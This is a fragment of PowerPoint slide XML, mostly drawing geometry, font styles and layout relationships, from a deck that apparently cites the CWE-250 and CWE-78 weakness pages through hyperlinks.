          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="7848585" y="0"/>
            <a:ext cx="1295404" cy="3623066"/>
            <a:chOff x="-7" y="0"/>
            <a:chExt cx="1295404" cy="3623066"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="867" name="Google Shape;867;p33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-7" y="0"/>
              <a:ext cx="643914" cy="3623066"/>
              <a:chOff x="-7" y="0"/>
              <a:chExt cx="643914" cy="3623066"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="868" name="Google Shape;868;p33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="201918" y="63821"/>
                <a:ext cx="72619" cy="101243"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="4011" h="5592" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="3663" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3555" y="1"/>
                      <a:pt x="3449" y="56"/>
                      <a:pt x="3384" y="153"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="76" y="5090"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="5241"/>
                      <a:pt x="26" y="5441"/>
                      <a:pt x="176" y="5542"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="226" y="5567"/>
                      <a:pt x="276" y="5592"/>
                      <a:pt x="351" y="5592"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="452" y="5592"/>
                      <a:pt x="552" y="5542"/>
                      <a:pt x="602" y="5441"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3910" y="504"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="4011" y="354"/>
                      <a:pt x="3960" y="153"/>
                      <a:pt x="3835" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3782" y="17"/>
                      <a:pt x="3722" y="1"/>
                      <a:pt x="3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3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="63976" y="15434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3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="111628" y="3180578"/>
                <a:ext cx="60362" cy="108177"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3334" h="5975" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="2984" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2870" y="1"/>
                      <a:pt x="2759" y="57"/>
                      <a:pt x="2707" y="160"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="75" y="5524"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5674"/>
                      <a:pt x="75" y="5850"/>
                      <a:pt x="226" y="5925"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="276" y="5950"/>
                      <a:pt x="326" y="5975"/>
                      <a:pt x="351" y="5975"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="476" y="5975"/>
                      <a:pt x="577" y="5900"/>
                      <a:pt x="652" y="5800"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3258" y="436"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3333" y="286"/>
                      <a:pt x="3283" y="110"/>
                      <a:pt x="3133" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3086" y="12"/>
                      <a:pt x="3035" y="1"/>
                      <a:pt x="29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3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="370258" y="4858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3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="88472" y="25155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3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="376818" y="3564044"/>
                <a:ext cx="59004" cy="59022"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3259" h="3260" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="1629" y="627"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2180" y="627"/>
                      <a:pt x="2632" y="1079"/>
                      <a:pt x="2632" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2632" y="2181"/>
                      <a:pt x="2180" y="2632"/>
                      <a:pt x="1629" y="2632"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1078" y="2632"/>
                      <a:pt x="627" y="2181"/>
                      <a:pt x="627" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="627" y="1079"/>
                      <a:pt x="1078" y="627"/>
                      <a:pt x="1629" y="627"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1629" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="727" y="1"/>
                      <a:pt x="0" y="728"/>
                      <a:pt x="0" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2532"/>
                      <a:pt x="727" y="3259"/>
                      <a:pt x="1629" y="3259"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2531" y="3259"/>
                      <a:pt x="3258" y="2532"/>
                      <a:pt x="3258" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3258" y="728"/>
                      <a:pt x="2531"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3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="196921" y="2238919"/>
                <a:ext cx="22722" cy="22975"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1255" h="1269" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="625" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="461" y="0"/>
                      <a:pt x="295" y="72"/>
                      <a:pt x="176" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="216"/>
                      <a:pt x="126" y="241"/>
                      <a:pt x="101" y="291"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="317"/>
                      <a:pt x="51" y="342"/>
                      <a:pt x="51" y="392"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="417"/>
                      <a:pt x="26" y="467"/>
                      <a:pt x="1" y="517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="542"/>
                      <a:pt x="1" y="592"/>
                      <a:pt x="1" y="642"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="793"/>
                      <a:pt x="51" y="943"/>
                      <a:pt x="176" y="1068"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="302" y="1194"/>
                      <a:pt x="452" y="1269"/>
                      <a:pt x="627" y="1269"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="778" y="1269"/>
                      <a:pt x="953" y="1194"/>
                      <a:pt x="1054" y="1068"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1179" y="943"/>
                      <a:pt x="1254" y="793"/>
                      <a:pt x="1254" y="642"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1254" y="592"/>
                      <a:pt x="1254" y="542"/>
                      <a:pt x="1229" y="517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1229" y="467"/>
                      <a:pt x="1204" y="417"/>
                      <a:pt x="1204" y="392"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1179" y="342"/>
                      <a:pt x="1154" y="317"/>
                      <a:pt x="1154" y="291"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1129" y="241"/>
                      <a:pt x="1104" y="216"/>
                      <a:pt x="1054" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1028" y="166"/>
                      <a:pt x="1003" y="141"/>
                      <a:pt x="978" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="928" y="91"/>
                      <a:pt x="903" y="66"/>
                      <a:pt x="853" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="828" y="41"/>
                      <a:pt x="778" y="16"/>
                      <a:pt x="753" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="711" y="5"/>
                      <a:pt x="668" y="0"/>
                      <a:pt x="6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3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="603052" y="0"/>
                <a:ext cx="22704" cy="22595"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1254" h="1248" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="614" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="0"/>
                      <a:pt x="288" y="57"/>
                      <a:pt x="176" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="194"/>
                      <a:pt x="125" y="219"/>
                      <a:pt x="100" y="270"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="295"/>
                      <a:pt x="50" y="320"/>
                      <a:pt x="50" y="370"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="395"/>
                      <a:pt x="0" y="445"/>
                      <a:pt x="0" y="495"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="520"/>
                      <a:pt x="0" y="570"/>
                      <a:pt x="0" y="620"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="771"/>
                      <a:pt x="50" y="946"/>
                      <a:pt x="176" y="1047"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="301" y="1172"/>
                      <a:pt x="451" y="1247"/>
                      <a:pt x="627" y="1247"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="777" y="1247"/>
                      <a:pt x="952" y="1172"/>
                      <a:pt x="1053" y="1047"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1178" y="946"/>
                      <a:pt x="1253" y="771"/>
                      <a:pt x="1253" y="620"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1253" y="570"/>
                      <a:pt x="1228" y="520"/>
                      <a:pt x="1228" y="495"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1228" y="445"/>
                      <a:pt x="1203" y="395"/>
                      <a:pt x="1203" y="370"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1178" y="320"/>
                      <a:pt x="1153" y="295"/>
                      <a:pt x="1128" y="270"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1103" y="219"/>
                      <a:pt x="1078" y="194"/>
                      <a:pt x="1053" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="940" y="57"/>
                      <a:pt x="777"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3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-7" y="1029179"/>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3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="341846" y="9701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3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="584884" y="20180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3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="507951" y="28901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0" name="Google Shape;880;p33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="853926" y="2268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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1272693" y="165079"/>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 name="Google Shape;882;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="294125" y="111775"/>
            <a:ext cx="425883" cy="216100"/>
            <a:chOff x="259675" y="4807625"/>
            <a:chExt cx="425883" cy="216100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="883" name="Google Shape;883;p33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="538673" y="4807625"/>
              <a:ext cx="146885" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3510" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2131" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="399195" y="4807625"/>
              <a:ext cx="145797" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3484" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2105" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1353" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="259675" y="4807625"/>
              <a:ext cx="145839" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3485" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2131" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34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 name="Google Shape;886;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="6412200" cy="5727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36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0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neu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0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-330200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-330200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-330200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-330200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-330200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-330200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-330200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-330200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-330200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksa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4" r:id="rId4"/>
    <p:sldLayoutId id="2147483658" r:id="rId5"/>
    <p:sldLayoutId id="2147483659" r:id="rId6"/>
    <p:sldLayoutId id="2147483666" r:id="rId7"/>
    <p:sldLayoutId id="2147483669" r:id="rId8"/>
    <p:sldLayoutId id="2147483679" r:id="rId9"/>
    <p:sldLayoutId id="2147483690" r:id="rId10"/>
    <p:sldLayoutId id="2147483691" r:id="rId11"/>
    <p:sldLayoutId id="2147483692" r:id="rId12"/>
    <p:sldLayoutId id="214748369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4.sv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4.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39.svg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide43.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/250.html"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cwe.mitre.org/data/definitions/250.html"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cwe.mitre.org/data/definitions/78.html"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41.svg"/></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50.sv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2.png"/><Relationship Id="rId4"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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.sv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55"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Google Shape;1259;p52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69A30CBB-7392-D905-92A2-31ECE0C3CFC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4743807" y="626304"/>
            <a:ext cx="5580356" cy="3990946"/>
            <a:chOff x="4942637" y="602890"/>
            <a:chExt cx="5182833" cy="3706647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Google Shape;1260;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DC07EBC-9534-D40F-F686-34A8C7CC49AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4942637" y="602890"/>
              <a:ext cx="4739257" cy="3706647"/>
              <a:chOff x="492625" y="305827"/>
              <a:chExt cx="6376825" cy="4987416"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1483" name="Google Shape;1261;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE8D192F-F999-2474-69A2-7E58669F90AF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3241925" y="1323275"/>
                <a:ext cx="149525" cy="33750"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="5981" h="1350" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="302" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="0"/>
                      <a:pt x="44" y="108"/>
                      <a:pt x="23" y="254"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="414"/>
                      <a:pt x="115" y="551"/>
                      <a:pt x="274" y="574"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="5638" y="1350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5684" y="1350"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="5821" y="1350"/>
                      <a:pt x="5935" y="1236"/>
                      <a:pt x="5958" y="1099"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5981" y="939"/>
                      <a:pt x="5867" y="802"/>
                      <a:pt x="5730" y="779"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="343" y="3"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="329" y="1"/>
                      <a:pt x="316" y="0"/>
                      <a:pt x="302"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84" name="Google Shape;1262;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDCE8B06-850F-2B09-3930-8DF723E85987}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
